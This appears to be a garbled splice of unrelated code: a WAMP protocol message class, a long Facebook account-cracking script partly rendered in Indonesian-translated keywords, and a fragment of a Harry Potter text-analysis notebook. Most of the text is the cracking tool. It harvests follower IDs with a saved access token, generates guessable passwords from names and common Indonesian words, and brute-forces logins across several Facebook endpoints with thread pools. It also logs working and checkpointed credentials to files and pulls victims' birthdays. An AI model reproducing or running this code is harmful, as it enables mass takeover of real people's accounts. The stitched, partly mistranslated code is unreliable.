:param enc_algo: If using payload encryption, the algorithm used (currently, only "cryptobox" is valid).
:type enc_algo: unicode
:param enc_key: If using payload encryption, the message encryption key.
:type enc_key: unicode or binary
:param enc_serializer: If using payload encryption, the encrypted payload object serializer.
:type enc_serializer: unicode
"""
assert(type(request_type) in six.integer_types)
assert(type(request) in six.integer_types)
assert(type(error) == six.text_type)
assert(args is None or type(args) in [list, tuple])
assert(kwargs is None or type(kwargs) == dict)
assert(payload is None or type(payload) in [six.text_type, six.binary_type])
assert(payload is None or (payload is not None and args is None and kwargs is None))
Message.__init__(self)
self.request_type = request_type
self.request = request
self.error = error
self.args = args
self.kwargs = kwargs
self.payload = payload
# end-to-end app payload encryption
self.enc_algo = enc_algo
self.enc_key = enc_key
self.enc_serializer = enc_serializer
@staticmethod
def parse(wmsg):
"""
Verifies and parses an unserialized raw message into an actual WAMP message instance.
:param wmsg: The unserialized raw message.
:type wmsg: list
:returns: An instance of this class.
"""
# this should already be verified by WampSerializer.unserialize
#
assert(len(wmsg) > 0 and wmsg[0] == Error.MESSAGE_TYPE)
if len(wmsg) not in (5, 6, 7):
raise ProtocolError("invalid message length {0} | |
%s" % ( len ( id ))))
kembali pilihcrack ( qq )
kecuali Pengecualian sebagai e :
keluar ( p + " \n [" + k + "•" + m + "•" + p + "] Kesalahan : %s" % e )
pasti mengikuti ():
coba :
toket=open("login.txt","r").read()
except IOError:
print((p+"\n ["+k+"•"+m+"•"+p+"] Cookie/Token Invalid"))
os.system("rm -rf login.txt")
logs()
try:
idt = input(p+" ["+k+"•"+m+"•"+p+"] Followers ID Target : ")
try:
jok = requests.get("https://graph.facebook.com/"+idt+"?access_token="+toket)
op = json.loads(jok.text)
print((p+" ["+k+"•"+m+"•"+p+"] Name: "+op["name"]))
except KeyError:
print((p+" ["+k+"•"+m+"•"+p+"] ID Not Found"))
print((p+"\n [BACK]"+p))
menu()
r=requests.get("https://graph.facebook.com/"+idt+"/subscribers?limit=20000&access_token="+toket)
id = []
z=json.loads(r.text)
qq = (op["first_name"]+".json").replace(" ","_")
ys = open(qq , "w")#.replace(" ","_")
for a in z["data"]:
id.append(a["id"]+"<=>"+a["name"])
ys.write(a["id"]+"<=>"+a["name"]+"\n")
ys.close()
print((p+" ["+k+"•"+m+"•"+p+"] Total ID : %s"%(len(id))))
return pilihcrack(qq)
except Exception as e:
exit(p+"\n ["+k+"•"+m+"•"+p+"] Error : %s"%e)
### Krek Nomer su! ###
def random_numbers():
data = []
print((p+"\n ["+k+"•"+m+"•"+p+"] Number Must Be 5 Digit"))
kode=str(input(p+" ["+k+"•"+m+"•"+p+"] Example : 92037\n"+p+" ["+k+"•"+m+"•"+p+"] Input Number: "))
exit((p+"\n ["+k+"•"+m+"•"+p+"] Number Must Be 5 Digit")) if len(kode) < 5 else ''
exit((p+"\n ["+k+"•"+m+"•"+p+"] Number Must Be 5 Digit")) if len(kode) > 5 else ''
jml=int(input(p+" ["+k+"•"+m+"•"+p+"] Amount : "))
[data.append({'user': str(e), 'pw':[str(e[5:]), str(e[6:])]}) for e in [str(kode)+''.join(['%s'%(randint(0,9)) for i in range(0,7)]) for e in range(jml)]]
print(p+" ["+k+"•"+m+"•"+p+"] Crack Started, Please Wait...\n")
with concurrent.futures.ThreadPoolExecutor(max_workers=15) as th:
{th.submit(brute, user['user'], user['pw']): user for user in data}
input(p+"\n [BACK]"+p)
menu()
def random_email():
data = []
nama=input(p+" ["+k+"•"+m+"•"+p+"] Target Name : ")
domain=input(p+" ["+k+"•"+m+"•"+p+"] Choose Domain [G]mail, [Y]ahoo, [H]otmail : ").lower().strip()
list={
'g':'@<EMAIL>',
'y':'@yahoo.com',
'h':'@hotmail.com'
}
exit(("\033[1;37m ["+k+"•"+m+"•"+p+"] Fill In The Correct")) if not domain in ['g','y','h'] else ''
jml=int(input(p+" ["+k+"•"+m+"•"+p+"] Amount : "))
setpw=input(p+" ["+k+"•"+m+"•"+p+"] Set Password : ").split(',')
print("\033[1;37m ["+k+"•"+m+"•"+p+"] Crack Started, Please Wait...\n")
[data.append({'user': nama+str(e)+list[domain], 'pw':[(i) for i in setpw]}) for e in range(1,jml+1)]
with concurrent.futures.ThreadPoolExecutor(max_workers=15) as th:
{th.submit(brute, user['user'], user['pw']): user for user in data}
input("\n\033[1;37m [BACK]")
menu()
def brute(user, passs):
try:
for pw in passs:
params={
'access_token': '<PASSWORD>',
'format': 'JSON',
'sdk_version': '2',
'email': user,
'locale': 'en_US',
'password': pw,
'sdk': 'ios',
'generate_session_cookies': '1',
'sig': '3f555f99fb61fcd7aa0c44f58f522ef6',
}
api='https://b-api.facebook.com/method/auth.login'
response=requests.get(api, params=params)
if re.search('(EAAA)\w+', str(response.text)):
print('\x1b[0;32m * --> %s • %s '%(str(user), str(pw)))
break
elif 'www.facebook.com' in response.json()['error_msg']:
print('\x1b[0;33m * --> %s • %s '%(str(user), str(pw)))
break
except: pass
### PASSWORD ###
def generate(text):
results=[]
global ips
for name in text.split("<=>"):
if len(name)<3:
continue
else:
name=name.lower()
if len(name)==3 or len(name)==4 or len(name)==5:
results.append(name)
results.append(name+"123")
results.append(name+"123456")
else:
results.append(name)
results.append(name+"123")
results.append(name+"123456")
if "indonesia" in ips:
results.append("sayang")
results.append("anjing")
results.append("bismillah")
results.append("kontol")
results.append("freefire")
results.append("bangsat")
results.append("bajingan")
return results
### MODULE CRACK ###
def mbasic(em,pas,hosts):
r=requests.Session()
r.headers.update({"Host":"mbasic.facebook.com","cache-control":"max-age=0","upgrade-insecure-requests":"1","user-agent":"Mozilla/5.0 (Linux; Android 10; Mi 9T Pro Build/QKQ1.190825.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/88.0.4324.181 Mobile Safari/537.36[FBAN/EMA;FBLC/it_IT;FBAV/239.0.0.10.109;]","accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8","accept-encoding":"gzip, deflate","accept-language":"id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7"})
p=r.get("https://mbasic.facebook.com/")
b=bs4.BeautifulSoup(p.text,"html.parser")
meta="".join(bs4.re.findall('dtsg":\{"token":"(.*?)"',p.text))
data={}
for i in b("input"):
if i.get("value") is None:
if i.get("name")=="email":
data.update({"email":em})
elif i.get("name")=="pass":
data.update({"pass":pas})
else:
data.update({i.get("name"):""})
else:
data.update({i.get("name"):i.get("value")})
data.update(
{"fb_dtsg":meta,"m_sess":"","__user":"0",
"__req":"d","__csr":"","__a":"","__dyn":"","encpass":""
}
)
r.headers.update({"referer":"https://mbasic.facebook.com/login/?next&ref=dbl&fl&refid=8"})
po=r.post("https://mbasic.facebook.com/login/device-based/login/async/?refsrc=https%3A%2F%2Fm.facebook.com%2Flogin%2F%3Fref%3Ddbl&lwv=100",data=data).text
if "c_user" in list(r.cookies.get_dict().keys()):
return {"status":"success","email":em,"pass":pas,"cookies":r.cookies.get_dict()}
elif "checkpoint" in list(r.cookies.get_dict().keys()):
return {"status":"cp","email":em,"pass":pas,"cookies":r.cookies.get_dict()}
else:return {"status":"error","email":em,"pass":pas}
def f_fb(em,pas,hosts):
global ua
r=requests.Session()
r.headers.update({"Host":"free.facebook.com","cache-control":"max-age=0","upgrade-insecure-requests":"1","user-agent":"Dalvik/1.6.0 (Linux; U; Android 4.4.2; NX55 Build/KOT5506) [FBAN/FB4A;FBAV/106.0.0.26.68;FBBV/45904160;FBDM/{density=3.0,width=1080,height=1920};FBLC/it_IT;FBRV/45904160;FBCR/PosteMobile;FBMF/asus;FBBD/asus;FBPN/com.facebook.katana;FBDV/ASUS_Z00AD;FBSV/5.0;FBOP/1;FBCA/x86:armeabi-v7a;]","accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8","accept-encoding":"gzip, deflate","accept-language":"id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7"})
p=r.get("https://free.facebook.com/")
b=bs4.BeautifulSoup(p.text,"html.parser")
meta="".join(bs4.re.findall('dtsg":\{"token":"(.*?)"',p.text))
data={}
for i in b("input"):
if i.get("value") is None:
if i.get("name")=="email":
data.update({"email":em})
elif i.get("name")=="pass":
data.update({"pass":pas})
else:
data.update({i.get("name"):""})
else:
data.update({i.get("name"):i.get("value")})
data.update(
{"fb_dtsg":meta,"m_sess":"","__user":"0",
"__req":"d","__csr":"","__a":"","__dyn":"","encpass":""
}
)
r.headers.update({"referer":"https://free.facebook.com/login/?next&ref=dbl&fl&refid=8"})
po=r.post("https://free.facebook.com/login/device-based/login/async/?refsrc=https%3A%2F%2Fm.facebook.com%2Flogin%2F%3Fref%3Ddbl&lwv=100",data=data).text
if "c_user" in list(r.cookies.get_dict().keys()):
return {"status":"success","email":em,"pass":pas,"cookies":r.cookies.get_dict()}
elif "checkpoint" in list(r.cookies.get_dict().keys()):
return {"status":"cp","email":em,"pass":pas,"cookies":r.cookies.get_dict()}
else:return {"status":"error","email":em,"pass":pas}
def touch_fb(em,pas,hosts):
global ua,touch_fbh
r=requests.Session()
r.headers.update({"Host":"touch.facebook.com","cache-control":"max-age=0","upgrade-insecure-requests":"1","user-agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Kiwi Chrome/68.0.3438.0 Safari/537.36","accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8","accept-encoding":"gzip, deflate, br","accept-language":"id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7"})
p=r.get("https://touch.facebook.com/")
b=bs4.BeautifulSoup(p.text,"html.parser")
meta="".join(bs4.re.findall('dtsg":\{"token":"(.*?)"',p.text))
data={}
for i in b("input"):
if i.get("value") is None:
if i.get("name")=="email":
data.update({"email":em})
elif i.get("name")=="pass":
data.update({"pass":pas})
else:
data.update({i.get("name"):""})
else:
data.update({i.get("name"):i.get("value")})
data.update(
{"fb_dtsg":meta,"m_sess":"","__user":"0",
"__req":"d","__csr":"","__a":"","__dyn":"","encpass":""
}
)
r.headers.update({"referer":"https://touch.facebook.com/login/?next&ref=dbl&fl&refid=8"})
po=r.post("https://touch.facebook.com/login/device-based/login/async/?refsrc=https%3A%2F%2Fm.facebook.com%2Flogin%2F%3Fref%3Ddbl&lwv=100",data=data).text
if "c_user" in r.cookies.get_dict().keys():
return {"status":"success","email":em,"pass":<PASSWORD>,"cookies":r.cookies.get_dict()}
elif "checkpoint" in r.cookies.get_dict().keys():
return {"status":"cp","email":em,"pass":pas,"cookies":r.cookies.get_dict()}
else:return {"status":"error","email":em,"pass":<PASSWORD>}#touch fb
def m_fb(em, pas, hosts):
r = requests.Session()
r.headers.update({"Host":"m.facebook.com","cache-control":"max-age=0","upgrade-insecure-requests":"1","user-agent":"Mozilla/5.0 (Linux; Android 8.1.0; CPH1909) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.93 Mobile Safari/537.36[FBAN/EMA;FBLC/it_IT;FBAV/240.0.0.9.115;]","accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8","accept-encoding":"gzip, deflate","accept-language":"id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7"})
p = r.get('https://m.facebook.com/')
b = bs4.BeautifulSoup(p.text, 'html.parser')
meta = ('').join(bs4.re.findall('dtsg":\\{"token":"(.*?)"', p.text))
data = {}
for i in b('input'):
if i.get('value') is None:
if i.get('name') == 'email':
data.update({'email': em})
elif i.get('name') == 'pass':
data.update({'pass': <PASSWORD>})
else:
data.update({i.get('name'): ''})
else:
data.update({i.get('name'): i.get('value')})
data.update({'fb_dtsg': meta, 'm_sess': '', '__user': '0', '__req': 'd',
'__csr': '', '__a': '', '__dyn': '', 'encpass': ''})
r.headers.update({'referer': 'https://m.facebook.com/login/?next&ref=dbl&fl&refid=8'})
po = r.post('https://m.facebook.com/login/device-based/login/async/?refsrc=https%3A%2F%2Fm.facebook.com%2Flogin%2F%3Fref%3Ddbl&lwv=100', data=data).text
if 'c_user' in r.cookies.get_dict().keys():
return {'status': 'success', 'email': em, 'pass': pas, 'cookies': r.cookies.get_dict()}
else:
if 'checkpoint' in r.cookies.get_dict().keys():
return {'status': 'cp', 'email': em, 'pass': pas, 'cookies': r.cookies.get_dict()}
else:
return {'status': 'error', 'email': em, 'pass': pas}
return
def touch_fb(em,pas,hosts):
global ua,touch_fbh
r=requests.Session()
r.headers.update({"Host":"touch.facebook.com","cache-control":"max-age=0","upgrade-insecure-requests":"1","user-agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Kiwi Chrome/68.0.3438.0 Safari/537.36","accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8","accept-encoding":"gzip, deflate, br","accept-language":"id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7"})
p=r.get("https://touch.facebook.com/")
b=bs4.BeautifulSoup(p.text,"html.parser")
meta="".join(bs4.re.findall('dtsg":\{"token":"(.*?)"',p.text))
data={}
for i in b("input"):
if i.get("value") is None:
if i.get("name")=="email":
data.update({"email":em})
elif i.get("name")=="pass":
data.update({"pass":pas})
else:
data.update({i.get("name"):""})
else:
data.update({i.get("name"):i.get("value")})
data.update(
{"fb_dtsg":meta,"m_sess":"","__user":"0",
"__req":"d","__csr":"","__a":"","__dyn":"","encpass":""
}
)
r.headers.update({"referer":"https://touch.facebook.com/login/?next&ref=dbl&fl&refid=8"})
po=r.post("https://touch.facebook.com/login/device-based/login/async/?refsrc=https%3A%2F%2Fm.facebook.com%2Flogin%2F%3Fref%3Ddbl&lwv=100",data=data).text
if "c_user" in r.cookies.get_dict().keys():
return {"status":"success","email":em,"pass":pas,"cookies":r.cookies.get_dict()}
elif "checkpoint" in r.cookies.get_dict().keys():
return {"status":"cp","email":em,"pass":pas,"cookies":r.cookies.get_dict()}
else:return {"status":"error","email":em,"pass":pas}#touch fb
### BRUTE CRACK ###
class crack:
os.system("clear")
banner()
def __init__(self,isifile):
self.ada=[]
self.cp=[]
self.ko=0
print((p+"\n ["+k+"•"+m+"•"+p+"] Crack With Pass Default/Manual [d/m]"))
while True:
f=input(p+" ["+k+"•"+m+"•"+p+"] Choose : ")
if f=="":continue
elif f=="m":
try:
while True:
try:
self.apk=isifile
self.fs=open(self.apk).read().splitlines()
break
except Exception as e:
print((" %s"%e))
continue
self.fl=[]
for i in self.fs:
try:
self.fl.append({"id":i.split("<=>")[0]})
except:continue
except Exception as e:
print((" %s"%e))
continue
print((p+" ["+k+"•"+m+"•"+p+"] Example : sayang,kontol,123456"))
self.pwlist()
break
elif f=="d":
try:
while True:
try:
self.apk=isifile
self.fs=open(self.apk).read().splitlines()
break
except Exception as e:
print((" %s"%e))
continue
self.fl=[]
for i in self.fs:
try:
self.fl.append({"id":i.split("<=>")[0],"pw":generate(i.split("<=>")[1])})
except:continue
except Exception as e:
print((" %s"%e))
print((p+"\n ["+k+"•"+m+"•"+p+"] Crack Started..."+p+"\n ["+k+"•"+m+"•"+p+"] Account [OK] Saved to : ok.txt"+p+"\n ["+k+"•"+m+"•"+p+"] Account [CP] Saved to : cp.txt"))
ThreadPool(35).map(self.main,self.fl)
os.remove(self.apk)
exit()
break
def pwlist(self):
self.pw=input(p+" ["+k+"•"+m+"•"+p+"] Password List : ").split(",")
if len(self.pw) ==0:
self.pwlist()
else:
for i in self.fl:
i.update({"pw":self.pw})
print((p+"\n ["+k+"•"+m+"•"+p+"] Crack Started..."+p+"\n ["+k+"•"+m+"•"+p+"] Account [OK] Saved to : ok.txt"+p+"\n ["+k+"•"+m+"•"+p+"] Account [CP] Saved to : cp.txt"))
ThreadPool(30).map(self.main,self.fl)
os.remove(self.apk)
exit()
def main(self,fl):
try:
for i in fl.get("pw"):
log=mbasic(fl.get("id"),
i,"https://mbasic.facebook.com")
if log.get("status")=="cp":
print(("\r\x1b[0;33m * --> %s • %s\n "%(fl.get("id"),i,)))
self.cp.append("%s • %s"%(fl.get("id"),i))
open("cp.txt","a+").write(
"%s • %s\n"%(fl.get("id"),i))
break
elif log.get("status")=="success":
print(("\r\x1b[0;32m * --> %s • %s "%(fl.get("id"),i)))
self.ada.append("%s • %s"%(fl.get("id"),i))
open("ok.txt","a+").write(
"%s • %s\n"%(fl.get("id"),i))
break
else:continue
self.ko+=1
print("\r\x1b[0;37m [Crack]\x1b[0;37m %s/%s \x1b[0;37mOK : %s \x1b[0;37mCP : %s\x1b[0;37m"%(self.ko,len(self.fl),len(self.ada),len(self.cp)), end=' ');sys.stdout.flush()
except:
self.main(fl)
class crackttl:
os.system("clear")
banner()
def __init__(self,isifile):
self.ada=[]
self.cp=[]
self.ko=0
print((p+"\n ["+k+"•"+m+"•"+p+"] Crack With Pass Default/Manual [d/m]"))
while True:
f=input(p+" ["+k+"•"+m+"•"+p+"] Choose : ")
if f=="":continue
elif f=="m":
try:
while True:
try:
self.apk=isifile
self.fs=open(self.apk).read().splitlines()
break
except Exception as e:
print((" %s"%e))
continue
self.fl=[]
for i in self.fs:
try:
self.fl.append({"id":i.split("<=>")[0]})
except:continue
except Exception as e:
print((" %s"%e))
continue
print((p+" ["+k+"•"+m+"•"+p+"] Example : sayang,kontol,123456"))
self.pwlist()
break
elif f=="d":
try:
while True:
try:
self.apk=isifile
self.fs=open(self.apk).read().splitlines()
break
except Exception as e:
print((" %s"%e))
continue
self.fl=[]
for i in self.fs:
try:
self.fl.append({"id":i.split("<=>")[0],"pw":generate(i.split("<=>")[1])})
except:continue
except Exception as e:
print((" %s"%e))
print((p+"\n ["+k+"•"+m+"•"+p+"] Crack Started..."+p+"\n ["+k+"•"+m+"•"+p+"] Account [OK] Saved to : ok.txt"+p+"\n ["+k+"•"+m+"•"+p+"] Account [CP] Saved to : cp.txt"))
ThreadPool(35).map(self.main,self.fl)
os.remove(self.apk)
exit()
break
def pwlist(self):
self.pw=input(p+" ["+k+"•"+m+"•"+p+"] Password List : ").split(",")
if len(self.pw) ==0:
self.pwlist()
else:
for i in self.fl:
i.update({"pw":self.pw})
print((p+"\n ["+k+"•"+m+"•"+p+"] Crack Started..."+p+"\n ["+k+"•"+m+"•"+p+"] Account [OK] Saved to : ok.txt"+p+"\n ["+k+"•"+m+"•"+p+"] Account [CP] Saved to : cp.txt"))
ThreadPool(30).map(self.main,self.fl)
os.remove(self.apk)
exit()
def main(self,fl):
try:
for i in fl.get("pw"):
log=mbasic(fl.get("id"),
i,"https://mbasic.facebook.com")
if log.get("status")=="cp":
try:
ke=requests.get("https://graph.facebook.com/"+fl.get("id")+"?access_token="+open("login.txt","r").read())
tt=json.loads(ke.text)
ttl=tt["birthday"]
except:pass
print("\r\x1b[0;33m * --> %s • %s • %s \x1b[0m "%(fl.get("id"),i,str(ttl)))
self.cp.append("%s • %s"%(fl.get("id"),i))
open("cp.txt","a+").write(
"%s • %s • %s\n"%(fl.get("id"),i,str(ttl)))
break
elif log.get("status")=="success":
print(("\r\x1b[0;32m * --> %s • %s "%(fl.get("id"),i)))
self.ada.append("%s • %s"%(fl.get("id"),i))
if fl.get("id") in open("ok.txt").read():
break
else:
open("ok.txt","a+").write(
"%s • %s\n"%(fl.get("id"),i))
break
else:continue
self.ko+=1
print("\r\x1b[0;37m [Crack]\x1b[0;37m %s/%s \x1b[0;37mOK : %s \x1b[0;37mCP : %s\x1b[0;37m"%(self.ko,len(self.fl),len(self.ada),len(self.cp)), end=' ');sys.stdout.flush()
except:
self.main(fl)
class crekm:
os.system("clear")
banner()
def __init__(self,isifile):
self.ada=[]
self.cp=[]
self.ko=0
print((p+"\n ["+k+"•"+m+"•"+p+"] Crack With Pass Default/Manual [d/m]"))
while True:
f=input(p+" ["+k+"•"+m+"•"+p+"] Choose : ")
if f=="":continue
elif f=="m":
try:
while True:
try:
self.apk=isifile
self.fs=open(self.apk).read().splitlines()
break
except Exception as e:
print((" %s"%e))
continue
self.fl=[]
for i in self.fs:
try:
self.fl.append({"id":i.split("<=>")[0]})
except:continue
except Exception as e:
print((" %s"%e))
continue
print((p+" ["+k+"•"+m+"•"+p+"] Example : sayang,kontol,123456"))
self.pwlist()
break
elif f=="d":
try:
while True:
try:
self.apk=isifile
self.fs=open(self.apk).read().splitlines()
break
except Exception as e:
print((" %s"%e))
continue
self.fl=[]
for i in self.fs:
try:
self.fl.append({"id":i.split("<=>")[0],"pw":generate(i.split("<=>")[1])})
except:continue
except Exception as e:
print((" %s"%e))
print((p+"\n ["+k+"•"+m+"•"+p+"] Crack Started..."+p+"\n ["+k+"•"+m+"•"+p+"] Account [OK] Saved to : ok.txt"+p+"\n ["+k+"•"+m+"•"+p+"] Account [CP] Saved to : cp.txt"))
ThreadPool(30).map(self.main,self.fl)
os.remove(self.apk)
exit()
break
def pwlist(self):
self.pw=input(p+" ["+k+"•"+m+"•"+p+"] Password List : ").split(",")
if len(self.pw) ==0:
self.pwlist()
else:
for i in self.fl:
i.update({"pw":self.pw})
print((p+"\n ["+k+"•"+m+"•"+p+"] Crack Started..."+p+"\n ["+k+"•"+m+"•"+p+"] Account [OK] Saved to : ok.txt"+p+"\n ["+k+"•"+m+"•"+p+"] Account [CP] Saved to : cp.txt"))
ThreadPool(30).map(self.main,self.fl)
os.remove(self.apk)
exit()
def main(self,fl):
try:
for i in fl.get("pw"):
log=m_fb(fl.get("id"),
i,"https://m.facebook.com")
if log.get("status")=="cp":
print(("\r\x1b[0;33m * --> %s • %s\n "%(fl.get("id"),i)))
self.cp.append("%s • %s"%(fl.get("id"),i))
open("cp.txt","a+").write(
"%s • %s\n"%(fl.get("id"),i))
break
elif log.get("status")=="success":
print(("\r\x1b[0;32m * --> %s • %s "%(fl.get("id"),i)))
self.ada.append("%s • %s"%(fl.get("id"),i))
open("ok.txt","a+").write(
"%s • %s\n"%(fl.get("id"),i))
break
else:continue
self.ko+=1
print("\r\x1b[0;37m [Crack]\x1b[0;37m %s/%s \x1b[0;37mOK : %s \x1b[0;37mCP : %s\x1b[0;37m"%(self.ko,len(self.fl),len(self.ada),len(self.cp)), end=' ');sys.stdout.flush()
except:
self.main(fl)
class crekmttl:
os.system("clear")
banner()
def __init__(self,isifile):
self.ada=[]
self.cp=[]
self.ko=0
print((p+"\n ["+k+"•"+m+"•"+p+"] Crack With Pass Default/Manual [d/m]"))
while True:
f=input(p+" ["+k+"•"+m+"•"+p+"] Choose : ")
if f=="":continue
elif f=="m":
try:
while True:
try:
self.apk=isifile
self.fs=open(self.apk).read().splitlines()
break
except Exception as e:
print((" %s"%e))
continue
self.fl=[]
for i in self.fs:
try:
self.fl.append({"id":i.split("<=>")[0]})
except:continue
except Exception as e:
print((" %s"%e))
continue
print((p+" ["+k+"•"+m+"•"+p+"] Example : sayang,kontol,123456"))
self.pwlist()
break
elif f=="d":
try:
while True:
try:
self.apk=isifile
self.fs=open(self.apk).read().splitlines()
break
except Exception as e:
print((" %s"%e))
continue
self.fl=[]
for i in self.fs:
try:
self.fl.append({"id":i.split("<=>")[0],"pw":generate(i.split("<=>")[1])})
except:continue
except Exception as e:
print((" %s"%e))
print((p+"\n ["+k+"•"+m+"•"+p+"] Crack Started..."+p+"\n ["+k+"•"+m+"•"+p+"] Account [OK] Saved to : ok.txt"+p+"\n ["+k+"•"+m+"•"+p+"] Account [CP] Saved to : cp.txt"))
ThreadPool(30).map(self.main,self.fl)
os.remove(self.apk)
exit()
break
def pwlist(self):
self.pw=input(p+" ["+k+"•"+m+"•"+p+"] Password List : ").split(",")
if len(self.pw) ==0:
self.pwlist()
else:
for i in self.fl:
i.update({"pw":self.pw})
print((p+"\n ["+k+"•"+m+"•"+p+"] Crack Started..."+p+"\n ["+k+"•"+m+"•"+p+"] Account [OK] Saved to : ok.txt"+p+"\n ["+k+"•"+m+"•"+p+"] Account [CP] Saved to : cp.txt"))
ThreadPool(30).map(self.main,self.fl)
os.remove(self.apk)
exit()
def main(self,fl):
try:
for i in fl.get("pw"):
log=m_fb(fl.get("id"),
i,"https://m.facebook.com")
if log.get("status")=="cp":
try:
ke=requests.get("https://graph.facebook.com/"+fl.get("id")+"?access_token="+open("login.txt","r").read())
tt=json.loads(ke.text)
ttl=tt["birthday"]
except:pass
print("\r\x1b[0;33m * --> %s • %s • %s \x1b[0m "%(fl.get("id"),i,str(ttl)))
self.cp.append("%s • %s"%(fl.get("id"),i))
open("cp.txt","a+").write(
"%s • %s • %s\n"%(fl.get("id"),i,str(ttl)))
break
elif log.get("status")=="success":
print(("\r\x1b[0;32m * --> %s • %s "%(fl.get("id"),i)))
self.ada.append("%s • %s"%(fl.get("id"),i))
if fl.get("id") in open("ok.txt").read():
break
else:
open("ok.txt","a+").write(
"%s • %s\n"%(fl.get("id"),i))
break
else:continue
self.ko+=1
print("\r\x1b[0;37m [Crack]\x1b[0;37m %s/%s \x1b[0;37mOK : %s \x1b[0;37mCP : %s\x1b[0;37m"%(self.ko,len(self.fl),len(self.ada),len(self.cp)), end=' ');sys.stdout.flush()
except:
self.main(fl)
class tofbe:
os.system("clear")
banner()
def __init__(self,isifile):
self.ada=[]
self.cp=[]
self.ko=0
print((p+"\n ["+k+"•"+m+"•"+p+"] Crack With Pass Default/Manual [d/m]"))
while True:
f=input(p+" ["+k+"•"+m+"•"+p+"] Choose : ")
if f=="":continue
elif f=="m":
try:
while True:
try:
self.apk=isifile
self.fs=open(self.apk).read().splitlines()
break
except Exception as e:
print((" %s"%e))
continue
self.fl=[]
for i in self.fs:
try:
self.fl.append({"id":i.split("<=>")[0]})
except:continue
except Exception as e:
print((" %s"%e))
continue
print((p+" ["+k+"•"+m+"•"+p+"] Example : sayang,kontol,123456"))
self.pwlist()
break
elif f=="d":
try:
while True:
try:
self.apk=isifile
self.fs=open(self.apk).read().splitlines()
break
except Exception as e:
print((" %s"%e))
continue
self.fl=[]
for i in self.fs:
try:
self.fl.append({"id":i.split("<=>")[0],"pw":generate(i.split("<=>")[1])})
except:continue
except Exception as e:
print((" %s"%e))
print((p+"\n ["+k+"•"+m+"•"+p+"] Crack Started..."+p+"\n ["+k+"•"+m+"•"+p+"] Account [OK] Saved to : ok.txt"+p+"\n ["+k+"•"+m+"•"+p+"] Account [CP] Saved to : cp.txt"))
ThreadPool(30).map(self.main,self.fl)
os.remove(self.apk)
exit()
break
def pwlist(self):
self.pw=input(p+" ["+k+"•"+m+"•"+p+"] Password List : ").split(",")
if len(self.pw) ==0:
self.pwlist()
else:
for i in self.fl:
i.update({"pw":self.pw})
print((p+"\n ["+k+"•"+m+"•"+p+"] Crack Started..."+p+"\n ["+k+"•"+m+"•"+p+"] Account [OK] Saved to : ok.txt"+p+"\n ["+k+"•"+m+"•"+p+"] Account [CP] Saved to : cp.txt"))
ThreadPool(30).map(self.main,self.fl)
os.remove(self.apk)
exit()
def main(self,fl):
try:
for i in fl.get("pw"):
log=touch_fb(fl.get("id"),
i,"https://touch.facebook.com")
if log.get("status")=="cp":
print(("\r\x1b[0;33m * --> %s • %s\n "%(fl.get("id"),i)))
self.cp.append("%s • %s"%(fl.get("id"),i))
open("cp.txt","a+").write(
"%s • %s\n"%(fl.get("id"),i))
break
elif log.get("status")=="success":
print(("\r\x1b[0;32m * --> %s • %s "%(fl.get("id"),i)))
self.ada.append("%s • %s"%(fl.get("id"),i))
open("ok.txt","a+").write(
"%s • %s\n"%(fl.get("id"),i))
break
else:continue
self.ko+=1
print("\r\x1b[0;37m [Crack]\x1b[0;37m %s/%s \x1b[0;37mOK : %s \x1b[0;37mCP : %s\x1b[0;37m"%(self.ko,len(self.fl),len(self.ada),len(self.cp)), end=' ');sys.stdout.flush()
except:
self.main(fl)
class tofbettl:
os.system("clear")
banner()
def __init__(self,isifile):
self.ada=[]
self.cp=[]
self.ko=0
print((p+"\n ["+k+"•"+m+"•"+p+"] Crack With Pass Default/Manual [d/m]"))
while True:
f=input(p+" ["+k+"•"+m+"•"+p+"] Choose : ")
if f=="":continue
elif f=="m":
try:
while True:
try:
self.apk=isifile
self.fs=open(self.apk).read().splitlines()
break
except Exception as e:
print((" %s"%e))
continue
self.fl=[]
for i in self.fs:
try:
self.fl.append({"id":i.split("<=>")[0]})
except:continue
except Exception as e:
print((" %s"%e))
continue
print((p+" ["+k+"•"+m+"•"+p+"] Example : sayang,kontol,123456"))
self.pwlist()
break
elif f=="d":
try:
while True:
try:
self.apk=isifile
self.fs=open(self.apk).read().splitlines()
break
except Exception as e:
print((" %s"%e))
continue
self.fl=[]
for i in self.fs:
try:
self.fl.append({"id":i.split("<=>")[0],"pw":generate(i.split("<=>")[1])})
except:continue
except Exception as e:
print((" %s"%e))
print((p+"\n ["+k+"•"+m+"•"+p+"] Crack Started..."+p+"\n ["+k+"•"+m+"•"+p+"] | |
sent = [str(sent) for sent in nlp(clean_text).sents] #Split the whole text into sentences
#print(len(sent))
#print(sent)
clean_sent = clean_documents(sent) #Apply clean_document function to the sentences
clean_sent = expandContractions(clean_sent) #Apply expandContraction function to expand text contractions
#print(clean_sent)
tokens = tokenizer(clean_sent) #Tokenize the sentences and retrieve only relevant tokens
instances = Instances(tokens) #Form the instances back
#print(tokens)
#print(instances)
data = {'Book': ['Harry Potter %s' %book for i in tokens],
'Tokens': [token for token in tokens],
'Instances':[inst for inst in instances]}
df = pd.DataFrame.from_dict(data)
corpustot = corpustot.append(df)
corpustot.head()
# In[5]:
corpustot.info()
corpustot = corpustot.reset_index(drop=True)
corpustot.tail()
# ## 2. Analysis
# <a id="analysis"></a>
# ###### Description of the research questions
# Investigate the content of Harry Potter Books by analyzing their text. The research aims at giving a general words and topics analysis for the whole saga. In particular it will put a focus on the change in the characters co-occurrences along the books, and at understanding the dynamics of three main topics between the first and the last book.
#
# - What are the most similar words to a given based on HP corpus?
# - What are the most frequent words-bigrams in HP?
